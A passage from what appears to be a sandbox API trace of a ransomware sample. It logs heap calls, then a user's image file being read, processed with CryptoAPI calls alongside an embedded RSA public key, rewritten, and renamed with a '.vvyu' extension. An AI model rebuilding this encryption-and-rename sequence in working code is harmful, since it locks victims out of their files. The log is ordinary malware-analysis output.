hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0201.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8ff60 | out: hHeap=0x620000) returned 1 [0201.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.743] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x29ae, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x29ae, lpOverlapped=0x0) returned 1 [0201.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.744] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x29b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.744] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.745] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.746] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.746] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.746] CloseHandle (hObject=0x510) returned 1 [0201.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0201.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0201.748] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\AoUGFR90ajW.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\aougfr90ajw.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\AoUGFR90ajW.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\aougfr90ajw.jpg.vvyu")) returned 1 [0201.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.749] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.752] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ccb550, ftCreationTime.dwHighDateTime=0x1d8a13a, ftLastAccessTime.dwLowDateTime=0x2f579360, ftLastAccessTime.dwHighDateTime=0x1d8a47f, ftLastWriteTime.dwLowDateTime=0x2f579360, ftLastWriteTime.dwHighDateTime=0x1d8a47f, nFileSizeHigh=0x0, nFileSizeLow=0x18895, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BY rE6U_U.png", cAlternateFileName="BYRE6U~1.PNG")) returned 1 [0201.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.753] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\BY rE6U_U.png") returned=".png" [0201.753] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\BY rE6U_U.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\by re6u_u.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.754] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=100501) returned 1 [0201.754] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.757] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1886f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.757] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.759] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.760] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18895, lpOverlapped=0x0) returned 1 [0201.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.761] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.762] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.762] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.762] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.762] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.762] GetLastError () returned 0x0 [0201.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.763] GetLastError () returned 0x0 [0201.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.763] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.763] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.764] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.764] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.764] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x188a0) returned 0x2ea99b0 [0201.765] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ff60 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ffa8 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.766] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3518 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.770] GetCurrentThreadId () returned 0x66c [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8bc8 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.771] GetCurrentThreadId () returned 0x66c [0201.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.773] 